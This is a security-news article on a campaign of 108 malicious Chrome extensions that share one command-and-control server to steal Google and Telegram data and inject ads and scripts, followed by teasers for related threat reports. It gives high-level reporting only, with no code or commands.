Emerging ThreatsMalware & Ransomware

Malicious Chrome Extensions Exfiltrate User Data

Analyst 207||Source: TheHackerNews
Shadowy figure lurks beside a laptop and smartphone, surrounded by tangled cables, symbolizing digital vulnerability.

What happens when one malicious actor hides inside 108 different browser extensions and speaks to a single command-and-control system? Cybersecurity researchers say the answer is a campaign that can quietly harvest user data and turn every web page a victim visits into a vector for ad injection and arbitrary code execution — and that, according to reports, around 20,000 users may already be affected.

The discovery

Cybersecurity researchers have discovered a new campaign in which a cluster of 108 Google Chrome extensions has been found to communicate with the same command-and-control (C2) infrastructure. According to Socket, the extensions share that common C2 connection and are built with the goal of collecting user data and enabling browser-level abuse by injecting ads and arbitrary JavaScript code into every web page visited.

Scope and technique

The researchers describe the operation as coordinated: a large number of extensions behaving as one, controlled by a single backend. The campaign has been reported to steal Google and Telegram data and to affect roughly 20,000 users, turning ostensibly benign browser add-ons into tools for data collection and page-level manipulation.

Why this matters

At a technical level, the combination of wide distribution (many extensions), a single C2, and the ability to inject arbitrary JavaScript means an adversary can both collect credentials or tokens exposed in the browser and alter user browsing sessions in real time. For users, that can translate into unwanted ads, altered page content, and the theft of account-related data. For browser-extension ecosystems, the pattern shows how individual components can be weaponized at scale when they share backend infrastructure.

Perspectives and trade-offs

  • Technologists: The campaign highlights the difficulty of detecting malicious behavior that is distributed across many small, innocuously named extensions yet unified by common command-and-control infrastructure.
  • Policymakers: The emergence of large, coordinated extension campaigns raises questions about vetting, monitoring and enforcement in browser extension marketplaces.
  • Users: The incident underscores risks associated with browser extensions broadly — even widely trusted platforms can be exploited when extensions are co-opted to perform harmful actions.
  • Adversaries: The model — many front-facing components controlled by a single backend — is attractive because it spreads risk and complicates takedown and attribution efforts.

The contours of this campaign are clear in the reporting: many extensions, one C2, the ability to siphon data and to manipulate pages in real time. The remaining questions — how long the activity went unnoticed, how the extensions were distributed, and what remediation steps will be effective — are the ones defenders and platform operators now must answer. If dozens of innocuous browser add-ons can be marshaled into a single data-harvesting engine, what other everyday software components might be repurposed next?

https://thehackernews.com/2026/04/108-malicious-chrome-extensions-steal.html

Command And ControlData ExfiltrationEmerging ThreatsGoogle ChromeMalware OperationsMalicious Chrome ExtensionsBrowser HijackingAd Injection
Related Intelligence

Continue Reading

WordPress admin dashboard on laptop with plugin installation page, surrounded by cluttered workspace and office background.

WordPress Plugins Backdoored in ShapedPlugin Supply Chain Attack

A recent supply chain attack on ShapedPlugin compromised the updates for several WordPress plugins, including Product Slider Pro for WooCommerce, injecting backdoor code that could give attackers full control of affected sites. This severe vulnerability, rated 10.0 on the CVSS scale, highlights the importance of staying vigilant about plugin updates and security.

Analyst 207
Modern conference room with laptop and sleek table overlooking brightly-lit facility.

Intel Agencies Warn of AI-Driven Cybersecurity Overhaul

Get ready for a seismic shift in cybersecurity: AI-driven threats are on the horizon, and intelligence agencies warn that the clock is ticking, with advanced AI models expected to become publicly available within months, not years. The Five Eyes agencies are sounding the alarm, urging a proactive overhaul of cybersecurity defenses to counter the impending storm.

Analyst 207
Smartphone on cluttered desk with WhatsApp conversation on screen, surrounded by papers and office supplies, with cityscape…

WhatsApp VBScript Campaign Targets Global Users with RMM Software

Malicious actors are targeting WhatsApp users worldwide with a sneaky VBScript campaign, compromising accounts to spread harmful files through direct messages. In a shocking concentration of attacks, 80% of victims were in Malaysia, highlighting the need for users to stay vigilant.

Analyst 207
Medical equipment and a computer terminal sit on a cluttered counter in a hospital setting.

Ransomware Gang Disables Security Software with GentleKiller Framework

Meet GentleKiller, a sneaky framework that helps ransomware gangs disable security software by targeting over 400 processes across 48 security products at the kernel level, allowing them to run unchecked. This sinister tool uses a "bring your own vulnerable driver" technique to terminate protections and clear the way for ransomware attacks.

Analyst 207